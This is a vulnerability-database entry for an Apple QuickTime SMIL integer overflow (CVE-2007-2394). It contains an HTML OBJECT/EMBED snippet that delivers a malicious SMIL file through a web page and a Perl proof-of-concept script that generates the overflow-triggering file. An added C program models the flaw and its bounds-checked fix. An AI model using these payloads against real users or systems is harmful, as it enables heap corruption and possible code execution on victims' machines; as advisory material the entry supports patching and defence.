Apple QuickTime Integer Overflow Vulnerability

Vulnerability ID: 1113289  Vulnerability type: Input validation
Published: 2007-07-11  Updated: 2007-07-18
CVE ID: CVE-2007-2394  CNNVD ID: CNNVD-200707-274
Platform: Multiple  CVSS score: 9.3
|Vulnerability source
https://www.exploit-db.com/exploits/30292
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200707-274
|Vulnerability details
Apple QuickTime is a popular multimedia player that supports many media formats. Apple QuickTime on Mac OS X contains an integer overflow vulnerability. QuickTime does not correctly handle the title and author fields in SMIL files. When a SMIL file is parsed, the length calculation can produce an insufficiently sized memory allocation; the subsequent copy of user-supplied data from the SMIL file then overruns the heap buffer, allowing execution of arbitrary instructions.
|Vulnerability EXP
source: http://www.securityfocus.com/bid/24873/info

Apple QuickTime is prone to an information-disclosure and multiple remote code-execution vulnerabilities.

Remote attackers may exploit these issues by enticing victims into opening maliciously crafted files or visiting maliciously crafted websites.

Successful exploits may allow attackers to execute arbitrary code in the context of a user running the vulnerable application or to obtain sensitive information. Failed exploit attempts of remote code-execution issues may result in denial-of-service conditions. Successful exploits of the information-disclosure issue may lead to further attacks. 

----------------------------------------------------------------------
ATTACK VECTORS
----------------------------------------------------------------------

This vulnerability can be triggered by luring a target user into
running a malicious SMIL file locally or via a webpage. In the latter
scenario the OBJECT (IE) and/or EMBED (Firefox) tags can be used:

<OBJECT
  CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"
  CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab"
  WIDTH="10" HEIGHT="10" >
  <!-- malicious SMIL file -->
  <PARAM NAME="src" VALUE="poc.smil" />
  <EMBED
    <!-- available .qtif or .mov file to start up QT for FF -->
    SRC="available-sample.qtif"
    <!-- malicious SMIL file -->
    QTSRC="poc.smil"
    WIDTH="10" HEIGHT="10"
    PLUGINSPAGE="www.apple.com/quicktime/download"
    TYPE="video/quicktime"
  />
</OBJECT>

----------------------------------------------------------------------
PROOF OF CONCEPT
----------------------------------------------------------------------

#!/usr/bin/perl -w

####
# QuickTime SMIL integer overflow vulnerability (CVE-2007-2394) POC
#
# Researched on QuickTime 7.1.3 on Windows 2000 SP4.
#
# David Vaartjes <d.vaartjes at gmail.com>
####

use strict;

my $file    = "poc.smil";   # output file referenced by the OBJECT/EMBED tags above
my $padd    = "x";          # filler byte used for the metadata fields
my $cop_len = 36;           # copyright field length

####
# By choosing the following lengths the
# integer overflow will be triggered.
####

my $tit_len  = 223;         # title field length
my $auth_len = 65280;       # author field length

open(FH, ">$file") or die "Can't open file: $!";

# Write a minimal SMIL document whose <meta> content attributes carry
# the oversized title and author strings.
print FH
 "<smil>\n".
 "<head>\n".
 " <meta name=\"title\" content=\"".$padd x $tit_len."\"/>\n".
 " <meta name=\"author\" content=\"".$padd x $auth_len."\"/>\n".
 " <meta name=\"copyright\" content=\"".$padd x $cop_len."\"/>\n".
 "</head>\n".
 "</smil>";

close(FH);
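As an added illustration (not QuickTime's code and not from the iDefense advisory or the PoC author), the C program below models the bug class that the details section and the PoC describe: the lengths of the title, author and copyright fields are read from a SMIL file and summed to size a heap allocation. The 16-bit accumulator is an assumption chosen for the demonstration (the page does not show QuickTime's real arithmetic); with it, the PoC's lengths 223 + 65280 + 36 = 65539 wrap to 3, so the buffer is far smaller than the data copied into it afterwards. The hardened variant accumulates in size_t with a bound check before every addition and rejects the file instead. The SMIL builder and the attribute extractor are constructed for this demo and mirror the document shape the PoC generates.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical record of the three metadata field lengths read from SMIL. */
typedef struct {
    size_t title_len;
    size_t author_len;
    size_t copyright_len;
} smil_meta_t;

/* Length of the content="..." value of <meta name="NAME" .../>, or 0 if the
 * element is absent. Minimal extractor for this demo only (no entity handling). */
size_t meta_content_len(const char *smil, const char *name) {
    char needle[64];
    snprintf(needle, sizeof needle, "name=\"%s\" content=\"", name);
    const char *p = strstr(smil, needle);
    if (!p) return 0;
    p += strlen(needle);
    const char *end = strchr(p, '"');
    return end ? (size_t)(end - p) : 0;
}

smil_meta_t parse_meta(const char *smil) {
    smil_meta_t m;
    m.title_len = meta_content_len(smil, "title");
    m.author_len = meta_content_len(smil, "author");
    m.copyright_len = meta_content_len(smil, "copyright");
    return m;
}

/* VULNERABLE pattern (assumed, not QuickTime's real code): field sizes are
 * summed in a 16-bit counter, so a total above 65535 silently wraps. */
uint16_t unsafe_alloc_size(const smil_meta_t *m) {
    uint16_t total = 0;
    total = (uint16_t)(total + m->title_len);
    total = (uint16_t)(total + m->author_len);
    total = (uint16_t)(total + m->copyright_len);
    return total;
}

/* True when a buffer sized by unsafe_alloc_size() is smaller than the bytes
 * that would be copied into it, i.e. the copy would overrun the heap chunk. */
bool unsafe_copy_overflows(const smil_meta_t *m) {
    size_t needed = m->title_len + m->author_len + m->copyright_len;
    return (size_t)unsafe_alloc_size(m) < needed;
}

/* HARDENED: accumulate in size_t and check against a fixed upper bound before
 * each addition; a file whose fields exceed the bound is rejected outright. */
bool safe_alloc_size(const smil_meta_t *m, size_t limit, size_t *out) {
    const size_t parts[3] = { m->title_len, m->author_len, m->copyright_len };
    size_t total = 0;
    for (int i = 0; i < 3; i++) {
        if (parts[i] > limit - total) return false; /* would exceed limit */
        total += parts[i];
    }
    *out = total;
    return true;
}

/* Build a SMIL document with 'x'-filled fields of the given lengths
 * (constructed input, same layout as the page's PoC). Caller frees. */
char *build_smil(size_t tit, size_t auth, size_t cop) {
    size_t cap = tit + auth + cop + 256;   /* fixed markup is well under 256 bytes */
    char *buf = malloc(cap);
    if (!buf) return NULL;
    char *p = buf;
    p += sprintf(p, "<smil>\n<head>\n <meta name=\"title\" content=\"");
    memset(p, 'x', tit); p += tit;
    p += sprintf(p, "\"/>\n <meta name=\"author\" content=\"");
    memset(p, 'x', auth); p += auth;
    p += sprintf(p, "\"/>\n <meta name=\"copyright\" content=\"");
    memset(p, 'x', cop); p += cop;
    sprintf(p, "\"/>\n</head>\n</smil>");
    return buf;
}

int main(void) {
    char *poc = build_smil(223, 65280, 36);   /* the PoC's field lengths */
    if (!poc) return 1;
    smil_meta_t m = parse_meta(poc);
    size_t needed = m.title_len + m.author_len + m.copyright_len;
    printf("16-bit sum: %u, bytes actually copied: %zu, heap overflow: %s\n",
           unsafe_alloc_size(&m), needed, unsafe_copy_overflows(&m) ? "yes" : "no");
    size_t sz;
    printf("hardened check: %s\n",
           safe_alloc_size(&m, 65535, &sz) ? "accepted" : "rejected");
    free(poc);
    return 0;
}
```

The detection value for a defender is the gap between `unsafe_alloc_size` (3) and the 65539 bytes actually copied; the fix pattern is the bound check performed before each addition rather than a comparison on the already-wrapped total.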
|References

Source: US-CERT
Name: TA07-193A
Link: http://www.us-cert.gov/cas/techalerts/TA07-193A.html
Source: VUPEN
Name: ADV-2007-2510
Link: http://www.frsirt.com/english/advisories/2007/2510
Source: SECUNIA
Name: 26034
Link: http://secunia.com/advisories/26034
Source: APPLE
Name: APPLE-SA-2007-07-11
Link: http://lists.apple.com/archives/Security-announce/2007/Jul/msg00001.html
Source: IDEFENSE
Name: 20070711 Apple QuickTime SMIL File Processing Integer Overflow Vulnerability
Link: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=556
Source: docs.info.apple.com
Link: http://docs.info.apple.com/article.html?artnum=305947
Source: XF
Name: quicktime-smil-overflow(35357)
Link: http://xforce.iss.net/xforce/xfdb/35357
Source: BID
Name: 24873
Link: http://www.securityfocus.com/bid/24873
Source: SECTRACK
Name: 1018373
Link: http://www.securitytracker.com/id?1018373
Source: BUGTRAQ
Name: 20070717 Re: iDefense Security Advisory 07.11.07: Apple QuickTime SMIL File Processing Integer Overflow Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/473882/100/100/threaded